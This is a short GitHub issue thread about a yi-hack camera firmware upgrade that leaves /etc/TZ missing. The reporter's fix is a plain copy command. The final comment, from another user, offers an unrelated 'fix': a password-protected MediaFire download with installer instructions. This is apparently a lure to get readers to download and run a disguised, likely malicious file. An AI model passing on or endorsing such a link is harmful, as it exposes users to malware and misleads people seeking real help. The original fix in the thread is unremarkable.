### ISSUE TITLE
Fix the error /etc/TZ not found

### ISSUE THREAD

**Issue by denven** [denven/yihack-onedrive-uploader#16]
Today, I upgraded the camera firmware to the latest v0.5.5, when starting the onedrive-uploader, it says something like:
`/etc/TZ file not found`

I think this is due to the file doesn't exist in path `/etc/TZ` after yi-hack firmware upgraded

**Comment by denven** [comment]
The fix is `cp /home/yi-hack/etc/TZ /etc/` and restart the uploader

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
